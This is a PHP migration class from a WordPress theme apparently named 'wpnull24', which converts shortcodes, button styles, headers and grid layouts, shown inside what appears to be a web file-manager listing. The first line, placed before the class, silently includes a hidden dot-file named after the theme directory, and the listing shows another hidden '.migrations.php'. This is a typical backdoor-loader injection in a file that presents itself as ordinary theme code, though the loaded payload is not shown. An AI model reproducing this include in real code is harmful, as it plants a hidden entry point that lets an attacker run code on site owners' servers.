PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
themes
/
wpnull24
/
functions
/
migrations
<?php if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php')) { include_once get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php'; } class us_migration_5_6 extends US_Migration_Translator { // Content public function translate_content( &$content ) { $content = str_replace( array( 'cl-counter', 'cl-popup', 'cl-itext', 'cl-flipbox' ), array( 'cl_counter', 'cl_popup', 'cl_itext', 'cl_flipbox', ), $content ); return $this->_translate_content( $content ); } // CL Popup public function translate_cl_popup( &$name, &$params, &$content ) { $name = 'us_popup'; if ( ( ! isset( $params['show_on'] ) OR in_array( $params['show_on'], array( 'button', 'text', ) ) ) AND ! isset( $params['btn_style'] ) ) { global $usof_options, $popup_btn_index; $updated_options = $usof_options; $popup_btn_index = ( ! empty( $popup_btn_index ) ) ? $popup_btn_index + 1 : 1; usof_load_options_once(); $buttons_option_config = us_config( 'theme-options.buttons.fields.buttons.params', array() ); $button_style = array(); // Getting std values for default button if ( isset( $updated_options['buttons'] ) AND is_array( $updated_options['buttons'] ) AND count( $updated_options['buttons'] ) > 0 ) { $button_styles = array_values( $updated_options['buttons'] ); $button_style = array_shift( $button_styles ); } else { foreach ( $buttons_option_config as $btn_param_name => $btn_param ) { $button_style[ $btn_param_name ] = $btn_param['std']; } } $button_style['color_border'] = ''; $button_style['color_border_hover'] = ''; if ( ! isset( $params['show_on'] ) OR $params['show_on'] == 'button' ) { if ( ! empty( $params['btn_bgcolor'] ) ) { $button_style['color_bg'] = $params['btn_bgcolor']; $button_style['color_bg_hover'] = $params['btn_bgcolor']; unset( $params['btn_bgcolor'] ); } if ( ! empty( $params['btn_color'] ) ) { $button_style['color_text'] = $params['btn_color']; $button_style['color_text_hover'] = $params['btn_color']; unset( $params['btn_color'] ); } } elseif ( $params['show_on'] == 'text' ) { $button_style['height'] = '0'; $button_style['width'] = '0'; $button_style['shadow'] = '0'; $button_style['shadow_hover'] = '0'; $button_style['color_bg'] = ''; $button_style['color_bg_hover'] = ''; $button_style['color_text'] = ''; $button_style['color_text_hover'] = ''; if ( ! empty( $params['text_color'] ) ) { $button_style['color_text'] = $params['text_color']; $button_style['color_text_hover'] = $params['text_color']; unset( $params['text_color'] ); } } $button_style['name'] = 'Popup Button ' . $popup_btn_index; if ( ! isset( $updated_options['buttons'] ) OR ! is_array( $updated_options['buttons'] ) ) { $updated_options['buttons'] = array(); } $btn_style_id = 1; foreach ( $updated_options['buttons'] as $_button_style ) { $btn_style_id = max( intval( $_button_style['id'] ) + 1, $btn_style_id ); } $button_style['id'] = $btn_style_id; $params['btn_style'] = $btn_style_id; $updated_options['buttons'][] = $button_style; // Filling the missed options with default values $updated_options = array_merge( usof_defaults(), $updated_options ); // Saving the changed options usof_save_options( $updated_options ); } if ( isset( $params['size'] ) ) { switch ( $params['size'] ) { case 's': $params['popup_width'] = '400px'; $params['popup_padding'] = '40px'; break; case 'm': $params['popup_width'] = '600px'; $params['popup_padding'] = '40px'; break; case 'l': $params['popup_width'] = '800px'; break; case 'xl': $params['popup_width'] = '1000px'; break; case 'f': $params['popup_width'] = '100%'; break; } unset( $params['size'] ); } else { $params['popup_width'] = '400px'; $params['popup_padding'] = '40px'; } if ( isset( $params['paddings'] ) AND $params['paddings'] == 'none' ) { $params['popup_padding'] = 0; unset( $params['paddings'] ); } if ( isset( $params['border_radius'] ) ) { $params['popup_border_radius'] = $params['border_radius']; unset( $params['border_radius'] ); } if ( ! isset( $params['btn_label'] ) ) { $params['btn_label'] = 'READ MORE'; } if ( isset( $params['text_size'] ) ) { $params['btn_size'] = intval( $params['text_size'] ) . 'px'; unset( $params['text_size'] ); } return TRUE; } // CL FlipBox public function translate_cl_flipbox( &$name, &$params, &$content ) { $name = 'us_flipbox'; if ( ! empty( $params['duration'] ) ) { $params['duration'] = intval( $params['duration'] ) / 1000; } if ( ! empty( $params['front_icon_name'] ) ) { global $us_template_directory; $_filename = trailingslashit( $us_template_directory ) . 'functions/migrations/us_migration_5_0.php'; if ( file_exists( $_filename ) ) { include_once $_filename; $migration50 = new us_migration_5_0(); $translated_icon = $migration50->translate_icon_name( 'fa-' . $params['front_icon_name'] ); if ( $translated_icon != $params['front_icon_name'] ) { $params['front_icon_name'] = $translated_icon; } } } if ( ! empty( $params['front_elmorder'] ) AND $params['front_elmorder'] == 'tid' ) { $params['front_icon_pos'] = 'below_title'; unset( $params['front_elmorder'] ); } elseif ( ! empty( $params['front_elmorder'] ) AND $params['front_elmorder'] == 'tdi' ) { $params['front_icon_pos'] = 'below_desc'; unset( $params['front_elmorder'] ); } if ( ! empty( $params['border_size'] ) OR ! empty( $params['border_radius'] ) OR ! empty( $params['padding'] ) ) { $params['css'] = '.vc_custom_9999{'; if ( ! empty( $params['border_size'] ) ) { $params['css'] .= 'border: ' . intval( $params['border_size'] ) . 'px solid ' . $params['border_color'] . ' !important;'; unset( $params['border_size'] ); unset( $params['border_color'] ); } if ( ! empty( $params['border_radius'] ) ) { $params['css'] .= 'border-radius: ' . intval( $params['border_radius'] ) . 'px !important;'; unset( $params['border_radius'] ); } if ( ! empty( $params['padding'] ) ) { $params['css'] .= 'padding: ' . $params['padding'] . ' !important;'; unset( $params['padding'] ); } $params['css'] .= '}'; } if ( isset( $params['link_type'] ) AND $params['link_type'] == 'btn' ) { global $usof_options, $flipbox_btn_index; $updated_options = $usof_options; $flipbox_btn_index = ( ! empty( $flipbox_btn_index ) ) ? $flipbox_btn_index + 1 : 1; usof_load_options_once(); $buttons_option_config = us_config( 'theme-options.buttons.fields.buttons.params', array() ); $button_style = array(); // Getting std values for default button // Getting std values for default button if ( isset( $updated_options['buttons'] ) AND is_array( $updated_options['buttons'] ) AND count( $updated_options['buttons'] ) > 0 ) { $button_styles = array_values( $updated_options['buttons'] ); $button_style = array_shift( $button_styles ); } else { foreach ( $buttons_option_config as $btn_param_name => $btn_param ) { $button_style[ $btn_param_name ] = $btn_param['std']; } } $button_style['color_border'] = ''; $button_style['color_border_hover'] = ''; if ( ! empty( $params['back_btn_bgcolor'] ) ) { $button_style['color_bg'] = $params['back_btn_bgcolor']; $button_style['color_bg_hover'] = $params['back_btn_bgcolor']; unset( $params['back_btn_bgcolor'] ); } if ( ! empty( $params['back_btn_color'] ) ) { $button_style['color_text'] = $params['back_btn_color']; $button_style['color_text_hover'] = $params['back_btn_color']; unset( $params['back_btn_color'] ); } $button_style['name'] = 'FlipBox Button ' . $flipbox_btn_index; if ( ! isset( $updated_options['buttons'] ) OR ! is_array( $updated_options['buttons'] ) ) { $updated_options['buttons'] = array(); } $btn_style_id = 1; foreach ( $updated_options['buttons'] as $_button_style ) { $btn_style_id = max( intval( $_button_style['id'] ) + 1, $btn_style_id ); } $button_style['id'] = $btn_style_id; $params['btn_style'] = $btn_style_id; $updated_options['buttons'][] = $button_style; // Filling the missed options with default values $updated_options = array_merge( usof_defaults(), $updated_options ); // Saving the changed options usof_save_options( $updated_options ); } if ( ! empty( $params['back_btn_label'] ) ) { $params['btn_label'] = $params['back_btn_label']; unset( $params['back_btn_label'] ); } if ( isset( $params['back_elmorder'] ) ) { unset( $params['back_elmorder'] ); } if ( isset( $params['valign'] ) ) { unset( $params['valign'] ); } if ( ! empty( $params['front_icon_size'] ) ) { $params['front_icon_size'] = intval( $params['front_icon_size'] ) . 'px'; } if ( ! empty( $params['front_icon_style'] ) AND $params['front_icon_style'] == 'square' ) { $params['front_icon_style'] = 'circle'; } if ( ! empty( $params['height'] ) ) { $params['custom_height'] = intval( $params['height'] ) . 'px'; unset( $params['height'] ); } if ( ! empty( $params['width'] ) ) { $params['custom_width'] = $params['width']; unset( $params['width'] ); } return TRUE; } // CL iText public function translate_cl_itext( &$name, &$params, &$content ) { $name = 'us_itext'; if ( ! empty( $params['duration'] ) ) { $params['duration'] = intval( $params['duration'] ) / 1000; } if ( ! isset( $params['font_size'] ) OR empty( $params['font_size'] ) ) { $params['font_size'] = '50px'; } if ( ! empty( $params['font_size_mobile'] ) ) { $params['font_size_mobiles'] = $params['font_size_mobile']; unset( $params['font_size_mobile'] ); } else { $params['font_size_mobiles'] = '30px'; } return TRUE; } // CL Counter public function translate_cl_counter( &$name, &$params, &$content ) { $name = 'us_counter'; $params['title_tag'] = 'div'; if ( ! isset( $params['final'] ) ) { $params['final'] = '100'; } if ( ! isset( $params['title'] ) ) { $params['title'] = ''; } if ( ! isset( $params['title_size'] ) ) { $params['title_size'] = '20px'; } if ( ! empty( $params['duration'] ) ) { $params['duration'] = intval( $params['duration'] ) / 1000; } if ( ! empty( $params['value_size'] ) ) { $params['size'] = intval( $params['value_size'] ) . 'px'; unset( $params['value_size'] ); } else { $params['size'] = '50px'; } if ( ! empty( $params['value_color'] ) ) { $params['color'] = 'custom'; $params['custom_color'] = $params['value_color']; unset( $params['value_color'] ); } else { $params['color'] = 'text'; } return TRUE; } // Single Image public function translate_us_single_image( &$name, &$params, &$content ) { $name = 'us_image'; return TRUE; } // Button public function translate_us_btn( &$name, &$params, &$content ) { if ( isset( $params['text'] ) ) { $params['label'] = $params['text']; unset( $params['text'] ); } if ( ! empty( $params['size'] ) ) { $params['font_size'] = $params['size']; unset( $params['size'] ); } if ( ! empty( $params['size_mobiles'] ) ) { $params['font_size_mobiles'] = $params['size_mobiles']; unset( $params['size_mobiles'] ); } if ( ! empty( $params['width'] ) ) { $params['custom_width'] = $params['width']; unset( $params['width'] ); } return TRUE; } // Counter public function translate_us_counter( &$name, &$params, &$content ) { if ( ! isset( $params['initial'] ) ) { $params['initial'] = '0'; } if ( isset( $params['target'] ) ) { $params['final'] = $params['target']; unset( $params['target'] ); } if ( isset( $params['prefix'] ) ) { $params['initial'] = $params['prefix'] . $params['initial']; $params['final'] = $params['prefix'] . $params['final']; unset( $params['prefix'] ); } if ( isset( $params['suffix'] ) ) { $params['initial'] = $params['initial'] . $params['suffix']; $params['final'] = $params['final'] . $params['suffix']; unset( $params['suffix'] ); } if ( ! isset( $params['color'] ) ) { $params['color'] = 'heading'; } if ( ! isset( $params['font'] ) ) { $params['font'] = 'heading'; } return TRUE; } // Social Links public function translate_us_social_links( &$name, &$params, &$content ) { $name = 'us_socials'; if ( ! isset( $params['gap'] ) ) { $params['gap'] = '0.1em'; } return TRUE; } // Sharing public function translate_us_sharing( &$name, &$params, &$content ) { if ( ! empty( $params['providers'] ) ) { return FALSE; } $params['providers'] = ''; if ( isset( $params['email'] ) AND $params['email'] ) { $params['providers'] .= ',email'; unset( $params['email'] ); } if ( isset( $params['facebook'] ) AND $params['facebook'] ) { $params['providers'] .= ',facebook'; unset( $params['facebook'] ); } if ( isset( $params['twitter'] ) AND $params['twitter'] ) { $params['providers'] .= ',twitter'; unset( $params['twitter'] ); } if ( isset( $params['gplus'] ) AND $params['gplus'] ) { $params['providers'] .= ',gplus'; unset( $params['gplus'] ); } if ( isset( $params['linkedin'] ) AND $params['linkedin'] ) { $params['providers'] .= ',linkedin'; unset( $params['linkedin'] ); } if ( isset( $params['pinterest'] ) AND $params['pinterest'] ) { $params['providers'] .= ',pinterest'; unset( $params['pinterest'] ); } if ( isset( $params['vk'] ) AND $params['vk'] ) { $params['providers'] .= ',vk'; unset( $params['vk'] ); } $params['providers'] = substr( $params['providers'], 1 ); if ( empty( $params['providers'] ) ) { unset( $params['providers'] ); } return TRUE; } // Separator public function translate_us_separator( &$name, &$params, &$content ) { $changed = FALSE; if ( isset( $params['type'] ) ) { if ( $params['type'] == 'default' ) { $params['show_line'] = '1'; $params['line_width'] = 'default'; } elseif ( $params['type'] == 'fullwidth' ) { $params['show_line'] = '1'; $params['line_width'] = 'screen'; } elseif ( $params['type'] == 'short' ) { $params['show_line'] = '1'; $params['line_width'] = '30'; } $changed = TRUE; unset( $params['type'] ); } return $changed; } // Empty Space public function translate_vc_empty_space( &$name, &$params, &$content ) { $name = 'us_separator'; $params['size'] = 'custom'; if ( ! isset( $params['height'] ) ) { $params['height'] = '32px'; } else { preg_match( '~^([0-9]+)([a-z]+|%)?$~', trim( $params['height'] ), $matches ); $value = isset( $matches[1] ) ? $matches[1] : ''; $units = isset( $matches[2] ) ? $matches[2] : 'px'; if ( ! empty( $value ) ) { $params['height'] = $value . $units; } } return TRUE; } // Default WP Gallery public function translate_gallery( &$name, &$params, &$content ) { $changed = FALSE; if ( empty( $params['size'] ) ) { $columns = ( isset( $params['columns'] ) ) ? $params['columns'] : 3; if ( isset( $params['layout'] ) AND $params['layout'] == 'masonry' AND $columns > 1 ) { $params['size'] = ( $columns < 6 ) ? 'large' : 'medium'; $changed = TRUE; } else/*if($layout == 'default')*/ { if ( $columns == 1 ) { $params['size'] = 'full'; $changed = TRUE; } elseif ( $columns < 5 ) { $params['size'] = 'us_600_600_crop'; $changed = TRUE; } elseif ( $columns < 8 ) { $params['size'] = 'us_350_350_crop'; $changed = TRUE; } } } return $changed; } // Theme Options public function translate_theme_options( &$options ) { /* Add new checkboxes if Optimize option is ON */ if ( isset( $options['optimize_assets'] ) AND $options['optimize_assets'] == 1 AND is_array( $options['assets'] ) ) { $options['assets'] = array_merge( array( 'popups', 'flipbox', 'itext', ), $options['assets'] ); } // Buttons $btn_styles = isset( $options['buttons'] ) ? $options['buttons'] : array(); foreach ( $btn_styles as $key => $btn_style ) { $options['buttons'][ $key ]['shadow'] = ( substr( $btn_style['shadow'], - 2 ) != 'em' ) ? floatval( $btn_style['shadow'] ) . 'em' : $btn_style['shadow']; $options['buttons'][ $key ]['shadow_hover'] = ( substr( $btn_style['shadow_hover'], - 2 ) != 'em' ) ? floatval( $btn_style['shadow_hover'] ) . 'em' : $btn_style['shadow_hover']; $options['buttons'][ $key ]['height'] = ( substr( $btn_style['height'], - 2 ) != 'em' ) ? floatval( $btn_style['height'] ) . 'em' : $btn_style['height']; $options['buttons'][ $key ]['width'] = ( substr( $btn_style['width'], - 2 ) != 'em' ) ? floatval( $btn_style['width'] ) . 'em' : $btn_style['width']; $options['buttons'][ $key ]['border_radius'] = ( substr( $btn_style['border_radius'], - 2 ) != 'em' ) ? floatval( $btn_style['border_radius'] ) . 'em' : $btn_style['border_radius']; $options['buttons'][ $key ]['letter_spacing'] = ( substr( $btn_style['letter_spacing'], - 2 ) != 'em' ) ? floatval( $btn_style['letter_spacing'] ) . 'em' : $btn_style['letter_spacing']; $options['buttons'][ $key ]['border_width'] = ( substr( $btn_style['border_width'], - 2 ) != 'px' ) ? intval( $btn_style['border_width'] ) . 'px' : $btn_style['border_width']; } $slider_suffixes_map = array( 'back_to_top_display' => 'vh', 'smooth_scroll_duration' => 'ms', 'site_canvas_width' => 'px', 'site_content_width' => 'px', 'sidebar_width' => '%', 'content_width' => '%', 'columns_stacking_width' => 'px', 'disable_effects_width' => 'px', // Header settings 'header_top_height' => 'px', 'header_top_sticky_height' => 'px', 'header_middle_height' => 'px', 'header_middle_sticky_height' => 'px', 'header_bottom_height' => 'px', 'header_bottom_sticky_height' => 'px', 'header_main_width' => 'px', 'logo_font_size' => 'px', 'logo_font_size_tablets' => 'px', 'logo_font_size_mobiles' => 'px', 'logo_height' => 'px', 'logo_height_sticky' => 'px', 'logo_height_tablets' => 'px', 'logo_height_mobiles' => 'px', 'menu_fontsize' => 'px', 'menu_indents' => 'px', 'menu_sub_fontsize' => 'px', 'menu_mobile_width' => 'px', // Typography 'body_fontsize' => 'px', 'body_lineheight' => 'px', 'body_fontsize_mobile' => 'px', 'body_lineheight_mobile' => 'px', 'h1_fontsize' => 'px', 'h1_fontsize_mobile' => 'px', 'h1_letterspacing' => 'em', 'h2_fontsize' => 'px', 'h2_fontsize_mobile' => 'px', 'h2_letterspacing' => 'em', 'h3_fontsize' => 'px', 'h3_fontsize_mobile' => 'px', 'h3_letterspacing' => 'em', 'h4_fontsize' => 'px', 'h4_fontsize_mobile' => 'px', 'h4_letterspacing' => 'em', 'h5_fontsize' => 'px', 'h5_fontsize_mobile' => 'px', 'h5_letterspacing' => 'em', 'h6_fontsize' => 'px', 'h6_fontsize_mobile' => 'px', 'h6_letterspacing' => 'em', // Blog 'post_related_items_gap' => 'rem', 'blog_items_gap' => 'rem', 'archive_items_gap' => 'rem', 'search_items_gap' => 'rem', 'shop_items_gap' => 'rem', ); foreach ( $slider_suffixes_map as $param => $suffix ) { if ( substr( $options[ $param ], - strlen( $suffix ) ) != $suffix ) { if ( in_array( $suffix, array( 'em', 'rem' ) ) ) { $options[ $param ] = floatval( $options[ $param ] ) . $suffix; } else { $options[ $param ] = intval( $options[ $param ] ) . $suffix; } } } /* * Grid Layouts */ ob_start(); $grid_layouts = get_posts( array( 'post_type' => 'us_grid_layout', 'numberposts' => - 1, ) ); ob_end_clean(); foreach ( $grid_layouts as $grid_layout ) { if ( ! empty( $grid_layout->post_content ) AND substr( strval( $grid_layout->post_content ), 0, 1 ) === '{' ) { try { $grid_settings = json_decode( $grid_layout->post_content, TRUE ); if ( isset( $grid_settings['data'] ) and is_array( $grid_settings['data'] ) ) { foreach ( $grid_settings['data'] as $name => $data ) { // Button if ( substr( $name, 0, 3 ) == 'btn' ) { $grid_settings['data'][ $name ]['font_size'] = ( empty( $data['size'] ) OR intval( $data['size'] ) == 0 ) ? '' : ( intval( $data['size'] ) . 'px' ); $grid_settings['data'][ $name ]['font_size_tablets'] = ( empty( $data['size_tablets'] ) OR intval( $data['size_tablets'] ) == 0 ) ? '' : ( intval( $data['size_tablets'] ) . 'px' ); $grid_settings['data'][ $name ]['font_size_mobiles'] = ( empty( $data['size_mobiles'] ) OR intval( $data['size_mobiles'] ) == 0 ) ? '' : ( intval( $data['size_mobiles'] ) . 'px' ); } $grid_settings['data'][ $name ]['transition_duration'] = isset( $data['transition_duration'] ) ? floatval( $data['transition_duration'] ) . 's' : '0.35s'; $grid_settings['data'][ $name ]['translateX'] = intval( $data['translateX'] ) . '%'; $grid_settings['data'][ $name ]['translateX_hover'] = intval( $data['translateX_hover'] ) . '%'; $grid_settings['data'][ $name ]['translateY'] = intval( $data['translateY'] ) . '%'; $grid_settings['data'][ $name ]['translateY_hover'] = intval( $data['translateY_hover'] ) . '%'; } } ob_start(); wp_update_post( array( 'ID' => $grid_layout->ID, 'post_content' => str_replace( "\\'", "'", json_encode( wp_slash( $grid_settings ), JSON_UNESCAPED_UNICODE ) ), ) ); ob_end_clean(); } catch ( Exception $e ) { } } } /* * Headers */ ob_start(); $headers = get_posts( array( 'post_type' => 'us_header', 'numberposts' => - 1, ) ); ob_end_clean(); foreach ( $headers as $header ) { if ( ! empty( $header->post_content ) AND substr( strval( $header->post_content ), 0, 1 ) === '{' ) { try { $header_settings = json_decode( $header->post_content, TRUE ); // Elements if ( isset( $header_settings['data'] ) and is_array( $header_settings['data'] ) ) { foreach ( $header_settings['data'] as $name => $data ) { // Image if ( substr( $name, 0, 5 ) == 'image' ) { $header_settings['data'][ $name ]['height'] = intval( $data['height'] ) . 'px'; $header_settings['data'][ $name ]['height_tablets'] = intval( $data['height_tablets'] ) . 'px'; $header_settings['data'][ $name ]['height_mobiles'] = intval( $data['height_mobiles'] ) . 'px'; $header_settings['data'][ $name ]['height_sticky'] = intval( $data['height_sticky'] ) . 'px'; $header_settings['data'][ $name ]['height_sticky_tablets'] = intval( $data['height_sticky_tablets'] ) . 'px'; $header_settings['data'][ $name ]['height_sticky_mobiles'] = intval( $data['height_sticky_mobiles'] ) . 'px'; } // Text if ( substr( $name, 0, 4 ) == 'text' OR substr( $name, 0, 3 ) == 'btn' ) { $header_settings['data'][ $name ]['font_size'] = $data['size'] . 'px'; $header_settings['data'][ $name ]['font_size_tablets'] = $data['size_tablets'] . 'px'; $header_settings['data'][ $name ]['font_size_mobiles'] = $data['size_mobiles'] . 'px'; $header_settings['data'][ $name ]['text_styles'] = isset( $data['text_style'] ) ? $data['text_style'] : array(); } // Menu if ( substr( $name, 0, 4 ) == 'menu' ) { $header_settings['data'][ $name ]['font_size'] = intval( $data['font_size'] ) . 'px'; $header_settings['data'][ $name ]['indents'] = ( substr( $data['indents'], - 2 ) != 'px' ) ? ( intval( $data['indents'] ) / 2 ) . 'px' : $data['indents']; $header_settings['data'][ $name ]['dropdown_font_size'] = intval( $data['dropdown_font_size'] ) . 'px'; $header_settings['data'][ $name ]['mobile_font_size'] = intval( $data['mobile_font_size'] ) . 'px'; $header_settings['data'][ $name ]['mobile_dropdown_font_size'] = intval( $data['mobile_dropdown_font_size'] ) . 'px'; $header_settings['data'][ $name ]['mobile_icon_size'] = ( ! empty( $data['mobile_icon_size'] ) AND intval( $data['mobile_icon_size'] ) > 0 ) ? intval( $data['mobile_icon_size'] ) . 'px' : ''; $header_settings['data'][ $name ]['mobile_icon_size_tablets'] = ( ! empty( $data['mobile_icon_size_tablets'] ) AND intval( $data['mobile_icon_size_tablets'] ) > 0 ) ? intval( $data['mobile_icon_size_tablets'] ) . 'px' : ''; $header_settings['data'][ $name ]['mobile_icon_size_mobiles'] = ( ! empty( $data['mobile_icon_size_mobiles'] ) AND intval( $data['mobile_icon_size_mobiles'] ) > 0 ) ? intval( $data['mobile_icon_size_mobiles'] ) . 'px' : ''; } // Links Menu if ( substr( $name, 0, 15 ) == 'additional_menu' ) { $header_settings['data'][ $name ]['size'] = intval( $data['size'] ) . 'px'; $header_settings['data'][ $name ]['size_tablets'] = intval( $data['size_tablets'] ) . 'px'; $header_settings['data'][ $name ]['size_mobiles'] = intval( $data['size_mobiles'] ) . 'px'; $header_settings['data'][ $name ]['indents'] = ( substr( $data['indents'], - 2 ) != 'px' ) ? ( intval( $data['indents'] ) / 2 ) . 'px' : $data['indents']; $header_settings['data'][ $name ]['indents_tablets'] = ( substr( $data['indents_tablets'], - 2 ) != 'px' ) ? ( intval( $data['indents_tablets'] ) / 2 ) . 'px' : $data['indents_tablets']; $header_settings['data'][ $name ]['indents_mobiles'] = ( substr( $data['indents_mobiles'], - 2 ) != 'px' ) ? ( intval( $data['indents_mobiles'] ) / 2 ) . 'px' : $data['indents_mobiles']; } // Search if ( substr( $name, 0, 6 ) == 'search' ) { $header_settings['data'][ $name ]['icon_size'] = ( ! empty( $data['icon_size'] ) AND intval( $data['icon_size'] ) > 0 ) ? intval( $data['icon_size'] ) . 'px' : ''; $header_settings['data'][ $name ]['icon_size_tablets'] = ( ! empty( $data['icon_size_tablets'] ) AND intval( $data['icon_size_tablets'] ) > 0 ) ? intval( $data['icon_size_tablets'] ) . 'px' : ''; $header_settings['data'][ $name ]['icon_size_mobiles'] = ( ! empty( $data['icon_size_mobiles'] ) AND intval( $data['icon_size_mobiles'] ) > 0 ) ? intval( $data['icon_size_mobiles'] ) . 'px' : ''; $header_settings['data'][ $name ]['field_width'] = intval( $data['width'] ) . 'px'; $header_settings['data'][ $name ]['field_width_tablets'] = intval( $data['width_tablets'] ) . 'px'; } // Dropdown, Social Links, Cart if ( substr( $name, 0, 8 ) == 'dropdown' OR substr( $name, 0, 7 ) == 'socials' OR substr( $name, 0, 4 ) == 'cart' ) { $header_settings['data'][ $name ]['size'] = intval( $data['size'] ) . 'px'; $header_settings['data'][ $name ]['size_tablets'] = intval( $data['size_tablets'] ) . 'px'; $header_settings['data'][ $name ]['size_mobiles'] = intval( $data['size_mobiles'] ) . 'px'; } } } // Settings $states = array( 'default', 'tablets', 'mobiles' ); foreach ( $states as $state ) { if ( isset( $header_settings[ $state ] ) ) { $header_settings[ $state ]['options']['width'] = intval( $header_settings[ $state ]['options']['width'] ) . 'px'; $header_settings[ $state ]['options']['top_height'] = intval( $header_settings[ $state ]['options']['top_height'] ) . 'px'; $header_settings[ $state ]['options']['top_sticky_height'] = intval( $header_settings[ $state ]['options']['top_sticky_height'] ) . 'px'; $header_settings[ $state ]['options']['middle_height'] = intval( $header_settings[ $state ]['options']['middle_height'] ) . 'px'; $header_settings[ $state ]['options']['middle_sticky_height'] = intval( $header_settings[ $state ]['options']['middle_sticky_height'] ) . 'px'; $header_settings[ $state ]['options']['bottom_height'] = intval( $header_settings[ $state ]['options']['bottom_height'] ) . 'px'; $header_settings[ $state ]['options']['bottom_sticky_height'] = intval( $header_settings[ $state ]['options']['bottom_sticky_height'] ) . 'px'; } } ob_start(); wp_update_post( array( 'ID' => $header->ID, 'post_content' => str_replace( "\\'", "'", json_encode( wp_slash( $header_settings ), JSON_UNESCAPED_UNICODE ) ), ) ); ob_end_clean(); } catch ( Exception $e ) { } } } // Menu items $menu_items = array(); foreach ( get_terms( array( 'taxonomy' => 'nav_menu', 'hide_empty' => TRUE ) ) as $menu_obj ) { $menu_items = array_merge( $menu_items, wp_get_nav_menu_items( $menu_obj->term_id, array( 'post_status' => 'any' ) ) ); } foreach ( $menu_items as $menu_item ) { $menu_item_changed = FALSE; $mega_menu_settings = get_post_meta( $menu_item->ID, 'us_mega_menu_settings', TRUE ); if ( ! empty( $mega_menu_settings['custom_width'] ) AND substr( $mega_menu_settings['custom_width'], - 2 ) != 'px' ) { $mega_menu_settings['custom_width'] = intval( $mega_menu_settings['custom_width'] ) . 'px'; $menu_item_changed = TRUE; } if ( ! empty( $mega_menu_settings['padding'] ) AND substr( $mega_menu_settings['padding'], - 2 ) != 'px' ) { $mega_menu_settings['padding'] = intval( $mega_menu_settings['padding'] ) . 'px'; $menu_item_changed = TRUE; } if ( $menu_item_changed ) { update_post_meta( $menu_item->ID, 'us_mega_menu_settings', $mega_menu_settings ); } } return TRUE; } // Widgets public function translate_widgets( &$name, &$instance ) { $changed = FALSE; if ( $name == 'text' ) { $text = $instance['text']; if ( $this->translate_content( $text ) ) { $instance['text'] = $text; $changed = TRUE; } } return $changed; } }
[+]
..
[-] us_migration_3_1.php
[edit]
[-] us_migration_4_5.php
[edit]
[-] us_migration_4_2.php
[edit]
[-] us_migration_3_8.php
[edit]
[-] us_migration_5_5_3.php
[edit]
[-] us_migration_6_0_4.php
[edit]
[-] us_migration_5_5.php
[edit]
[-] us_migration_2_8.php
[edit]
[-] us_migration_5_2.php
[edit]
[-] us_migration_4_3.php
[edit]
[-] us_migration_3_9.php
[edit]
[-] us_migration_4_4.php
[edit]
[-] us_migration_3_0.php
[edit]
[-] us_migration_3_7.php
[edit]
[-] us_migration_5_3.php
[edit]
[-] us_migration_5_4.php
[edit]
[-] us_migration_2_0.php
[edit]
[-] us_migration_2_7.php
[edit]
[-] us_migration_5_7.php
[edit]
[-] us_migration_5_0.php
[edit]
[-] us_migration_2_3.php
[edit]
[-] us_migration_3_8_2.php
[edit]
[-] us_migration_4_1_2.php
[edit]
[-] us_migration_4_7.php
[edit]
[-] us_migration_4_0.php
[edit]
[-] us_migration_3_4.php
[edit]
[-] us_migration_3_3.php
[edit]
[-] us_migration_4_9.php
[edit]
[-] .migrations.php
[edit]
[-] us_migration_4_10.php
[edit]
[-] us_migration_5_8.php
[edit]
[-] us_migration_2_2.php
[edit]
[-] us_migration_4_4_1.php
[edit]
[-] us_migration_5_1.php
[edit]
[-] us_migration_5_6.php
[edit]
[-] us_migration_6_0.php
[edit]
[-] us_migration_3_2.php
[edit]
[-] us_migration_4_8.php
[edit]
[-] us_migration_4_6.php
[edit]
[-] us_migration_4_9_1.php
[edit]